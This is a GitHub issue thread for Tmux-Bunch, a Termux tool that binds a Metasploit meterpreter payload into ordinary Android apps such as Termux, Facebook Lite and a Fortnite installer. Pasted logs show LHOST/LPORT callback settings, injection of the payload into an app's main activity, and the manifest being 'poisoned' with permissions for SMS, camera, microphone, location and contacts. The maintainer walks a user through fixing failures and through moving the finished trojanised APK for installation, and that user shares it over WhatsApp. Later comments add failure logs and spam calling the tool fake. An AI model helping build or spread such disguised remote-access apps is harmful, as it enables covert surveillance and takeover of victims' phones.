### ISSUE TITLE
Its error'.. why?

### ISSUE THREAD

**Issue by Iluztration** [Hax4us/Tmux-Bunch#20]
tbunch -b /sdcard/Download/a.apk
 [*] Please enter following details :-
 [*] LHOST :-
100.118.52.85
 [*] LPORT :-
4444
 [*] ENTER THE NAME YOU WANT TO GIVE FOR THE FINAL APP
g.apk

 [*] Please wait while binding.......🕜

Using APK template: /sdcard/Download/a.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20180715-24231-16pok8f/original/AndroidManifest.xml
 signing apk .......
mv: cannot stat '/data/data/com.termux/files/home/Tmux-Bunch/unsign/output.apk': No such file or directory
Failed to initialize runtime (check log for details)
rm: cannot remove '/data/data/com.termux/files/home/Tmux-Bunch/unsign/g.apk.apk': No such file or directory

 We will met again :D , have a payload day..! 📢

Check embout folder for binded payload

**Comment by Hax4us** [comment]
Can you try on any other app like terminal emulator for testing

**Comment by Iluztration** [comment]
Ok im test terminal emulator now
Wait for results :)

**Comment by Iluztration** [comment]
(IM testing Termux)
tbunch -b /$HOME/Termux_v0.64_apkpure.com.apk
 [*] Please enter following details :-
 [*] LHOST :-
100.118.53.85
 [*] LPORT :-
4444
 [*] ENTER THE NAME YOU WANT TO GIVE FOR THE FINAL APP
termux.apk

 [*] Please wait while binding.......🕜

Using APK template: //data/data/com.termux/files/home/Termux_v0.64_apkpure.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.termux.nibaz
[*] Loading /data/data/com.termux/files/usr/tmp/d20180715-25734-17lakv2/original/smali/com/termux/app/TermuxActivity.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Rebuilding //data/data/com.termux/files/home/Termux_v0.64_apkpure.com.apk with meterpreter injection as /data/data/com.termux/files/usr/tmp/d20180715-25734-17lakv2/output.apk and yes it's me guys...your friend Lokesh (Hax4Us) thanx for using my tool TMUX-BUNCH
[*] Note :- Tmux-Bunch is my tool but this apk.rb script is written by Metasploit team and I am just a modifier of this script for binding payload in termux
Payload size: 0 bytes

 signing apk .......
Failed to initialize runtime (check log for details)

 We will met again :D , have a payload day..! 📢

Check embout folder for binded payload

**Comment by Hax4us** [comment]
Thnx for your report can you post output of this command `termux-info`

**Comment by Iluztration** [comment]
termux-info
Updatable packages:
All packages up to date
System information:
Linux localhost 3.18.31-perf-gf032b97 #1 SMP PREEMPT Thu Apr 5 20:41:56 WIB 2018 aarch64 Android
Termux-packages arch:
aarch64
Android version:
7.1.2
Device manufacturer:
Xiaomi
Device model:
Redmi 4X

**Comment by Hax4us** [comment]
Since Apksigner is not working in some phones so you should use v2.6 https://github.com/Hax4us/Tmux-Bunch/releases/download/2.6/Tmux-Bunch-2.6.tar.gz

**Comment by Iluztration** [comment]
Ok im try

**Comment by Iluztration** [comment]
How i can install it?
https://github.com/Hax4us/Tmux-Bunch/releases/download/2.6/Tmux-Bunch-2.6.tar.gz
Give a command for install

**Comment by Hax4us** [comment]
`apt install wget && wget https://github.com/Hax4us/Tmux-Bunch/releases/download/2.6/Tmux-Bunch-2.6.tar.gz && rm -rf Tmux-Bunch && tar -xf Tmux-Bunch-2.6.tar.gz && cd Tmux-Bunch && bash setup`

Paste above whole command

**Comment by Iluztration** [comment]
Wait.. ok..

**Comment by Iluztration** [comment]
tbunch -b /$HOME/Termux_v0.64_apkpure.com.apk
 [*] Please enter following details :-
 [*] LHOST :-
100.118.52.85
 [*] LPORT :-
4444
 [*] ENTER THE NAME YOU WANT TO GIVE FOR THE FINAL APP
termux

 [*] Please wait while binding.......🕜

Using APK template: //data/data/com.termux/files/home/Termux_v0.64_apkpure.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.termux.vpjdl
[*] Loading /data/data/com.termux/files/usr/tmp/d20180715-17645-2f97bq/original/smali/com/termux/app/TermuxActivity.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Rebuilding //data/data/com.termux/files/home/Termux_v0.64_apkpure.com.apk with meterpreter injection as /data/data/com.termux/files/usr/tmp/d20180715-17645-2f97bq/output.apk and yes it's me guys...your friend Lokesh (Hax4Us) thanx for using my tool TMUX-BUNCH
[*] Note :- Tmux-Bunch is my tool but this apk.rb script is written by Metasploit team and I am just a modifier of this script for binding payload in termux
Payload size: 0 bytes

 signing apk .......

 We will met again :D , have a payload day..! 📢

Check embout folder for binded payload
?? How? Mr

**Comment by Hax4us** [comment]
Check embout folder

**Comment by Iluztration** [comment]
Im share via WhatsApp , and can not install that

**Comment by Hax4us** [comment]
Give your bonded payload here

**Comment by Iluztration** [comment]
How ? Mr?

**Comment by Hax4us** [comment]
`ls -la $HOME/Tmux-Bunch/embout`
Give output here

**Comment by Iluztration** [comment]
ls -la $HOME/Tmux-Bunch/embout
total 18064
drwx------  2 u0_a238 u0_a238     4096 Jul 15 23:58 .
drwx------ 14 u0_a238 u0_a238     4096 Jul 15 23:57 ..
-rw-------  1 u0_a238 u0_a238 18481648 Jul 15 23:59 emu.apk

**Comment by Hax4us** [comment]
`mv $HOME/Tmux-Bunch/embout/emu.apk /sdcard`

Then you can install it from sdcard

**Comment by Iluztration** [comment]
Why payload size 0?

**Comment by Hax4us** [comment]
Give screenshot of size

**Comment by Iluztration** [comment]
Thanks very much , no error' :)

**Comment by TU4NN1CKN4M3** [comment]
Tmuxbunch v2.4 same to, not working on
Device xiaomi redmi 4x nougat please help

**Comment by larva007** [comment]
help me please me eror

**Comment by djaman** [comment]
apt install wget && wget https://github.com/Hax4us/Tmux-Bunch/releases/download/2.6/Tmux-Bunch-2.6.tar.gz && rm -rf Tmux-Bunch && tar -xf Tmux-Bunch-2.6.tar.gz && cd Tmux-Bunch && bash setup

**Comment by kel12345678** [comment]
hello how install java for tmux-bunch

**Comment by rekcahkumar** [comment]
[*] Please wait while binding.......🕜

/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Using APK template: ttt.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20190308-1926-r7hacw/original/AndroidManifest.xml
 signing apk .......
mv: cannot stat '/data/data/com.termux/files/home/Tmux-Bunch/unsign/output.apk': No such file or directory
Exception in thread "main" java.io.FileNotFoundException: /data/data/com.termux/files/home/Tmux-Bunch/unsign/virus.apk: open failed: ENOENT (No such file or directory)
        at libcore.io.IoBridge.open(IoBridge.java:485)
        at java.io.RandomAccessFile.<init>(RandomAccessFile.java:288)
        at java.io.RandomAccessFile.<init>(RandomAccessFile.java:151)
        at net.fornwall.apksigner.zipio.ZipInput.<init>(ZipInput.java:20)
        at net.fornwall.apksigner.ZipSigner.signZip(ZipSigner.java:146)
        at net.fornwall.apksigner.Main.main(Main.java:90)
Caused by: android.system.ErrnoException: open failed: ENOENT (No such file or directory)
        at libcore.io.Linux.open(Native Method)
        at libcore.io.BlockGuardOs.open(BlockGuardOs.java:210)
        at libcore.io.IoBridge.open(IoBridge.java:471)
        ... 5 more
rm: cannot remove '/data/data/com.termux/files/home/Tmux-Bunch/unsign/virus.apk': No such file or directory

 We will met again :D , have a payload day..! 📢

 press ENTER for main menu

I tried in terminal emulator still same help

**Comment by shridoy143** [comment]
Hax4 us please help me bro..
[*] Please wait while binding.......🕜

/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Traceback (most recent call last):
        29: from ./msfvenom:428:in `<main>'
        28: from ./msfvenom:55:in `framework'
        27: from ./msfvenom:36:in `init_framework'
        26: from ./msfvenom:18:in `require_deps'
        25: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:54:in `require'
        24: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:54:in `require'
        23: from /data/data/com.termux/files/home/metasploit-framework/lib/msfenv.rb:18:in `<top (required)>'
        22: from /data/data/com.termux/files/home/metasploit-framework/lib/msfenv.rb:18:in `require'
        21: from /data/data/com.termux/files/home/metasploit-framework/config/environment.rb:2:in `<top (required)>'
        20: from /data/data/com.termux/files/home/metasploit-framework/config/environment.rb:2:in `require'
        19: from /data/data/com.termux/files/home/metasploit-framework/config/application.rb:1:in `<top (required)>'
        18: from /data/data/com.termux/files/home/metasploit-framework/config/application.rb:1:in `require'
        17: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/railties-4.2.11/lib/rails.rb:11:in `<top (required)>'
        16: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/railties-4.2.11/lib/rails.rb:11:in `require'
        15: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/railties-4.2.11/lib/rails/application.rb:7:in `<top (required)>'
        14: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/railties-4.2.11/lib/rails/application.rb:7:in `require'
        13: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/railties-4.2.11/lib/rails/engine.rb:1:in `<top (required)>'
        12: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/railties-4.2.11/lib/rails/engine.rb:1:in `require'
        11: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/railties-4.2.11/lib/rails/railtie.rb:2:in `<top (required)>'
        10: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/railties-4.2.11/lib/rails/railtie.rb:2:in `require'
         9: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/railties-4.2.11/lib/rails/configuration.rb:2:in `<top (required)>'
         8: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/railties-4.2.11/lib/rails/configuration.rb:2:in `require'
         7: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object.rb:12:in `<top (required)>'
         6: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object.rb:12:in `require'
         5: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/json.rb:4:in `<top (required)>'
         4: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/json.rb:4:in `require'
         3: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/big_decimal/conversions.rb:2:in `<top (required)>'
         2: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/big_decimal/conversions.rb:2:in `require'
         1: from /data/data/com.termux/files/usr/lib/ruby/2.6.0/bigdecimal/util.rb:9:in `<top (required)>'
/data/data/com.termux/files/usr/lib/ruby/2.6.0/bigdecimal/util.rb:9:in `require': dlopen failed: cannot locate symbol "rmpd_util_str_to_d" referenced by "util.so"... - /data/data/com.termux/files/usr/lib/ruby/2.6.0/arm-linux-androideabi/bigdecimal/util.so (LoadError)
 signing apk .......
mv: cannot stat '/data/data/com.termux/files/home/Tmux-Bunch/unsign/output.apk': No such file or directory
java.io.FileNotFoundException: /data/data/com.termux/files/home/Tmux-Bunch/unsign/ddf.apk (No such file or directory)
        at java.util.zip.ZipFile.open(Native Method)
        at java.util.zip.ZipFile.<init>(ZipFile.java:215)
        at java.util.zip.ZipFile.<init>(ZipFile.java:145)
        at java.util.jar.JarFile.<init>(JarFile.java:154)
        at java.util.jar.JarFile.<init>(JarFile.java:133)
        at com.android.signapk.SignApk.main(SignApk.java:949)
rm: cannot remove '/data/data/com.termux/files/home/Tmux-Bunch/unsign/ddf.apk': No such file or directory

 We will met again :D , have a payload day..! 📢

 press ENTER for main menu
Mv can't start

**Comment by TechDossier** [comment]
**Tmux-Bunch No works**
**Waste of time. Tryed all methods**

*] Please wait while binding.......🕜

Using APK template: Fblite.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20190817-24000-a257bb/original/AndroidManifest.xml
 signing apk .......
mv: cannot stat '/data/data/com.termux/files/home/Tmux-Bunch/unsign/output.apk': No such file or directory
Bad system call
rm: cannot remove '/data/data/com.termux/files/home/Tmux-Bunch/unsign/fblite.apk': No such file or directory

**Comment by TechDossier** [comment]
[*] Please wait while binding.......🕜

Using APK template: Fblite.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20190821-2071-170i9xa/original/AndroidManifest.xml
 signing apk .......
mv: cannot stat '/data/data/com.termux/files/home/Tmux-Bunch/unsign/output.apk': No such file or directory
Bad system call
rm: cannot remove '/data/data/com.termux/files/home/Tmux-Bunch/unsign/fblt.apk': No such file or directory

 We will met again :D , have a payload day..! 📢

 press ENTER for main menu

**Comment by TechDossier** [comment]
**TMUXBUNCH** tool is edited  from original tool "patch apk". 
Ifthes doesn't work no one. It only shows ERRORS. Not working tool. 

In this looks cool but waste. Just modified like a tool not yet work. Waste of data & waste of time. 

My suggestions.  Don't use anything in **hack4us** tools. It's all fake.

**Comment by TechDossier** [comment]
#48 #26 #5 #21 #13 

**TMUX-BUNCH**

#34 #jarsigner #8 #46 #21 #9 #17


FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 

FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL

**Comment by TechDossier** [comment]
#48 #26 #5 #21 #13 

**TMUX-BUNCH**

#34 #jarsigner #8 #46 #21 #9 #17


FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 

FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL 
FAKE TOOL
FAKE TOOL
FAKE TOOL

**Comment by roanokee** [comment]
@Hax4us Please wait while binding.......🕜

Using APK template: /data/data/com.termux/files/home/Tmux-Bunch/binder/FortniteInstaller-3.1.1.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/ubuntu/ubuntu-fs/root/.bind/original/AndroidManifest.xml
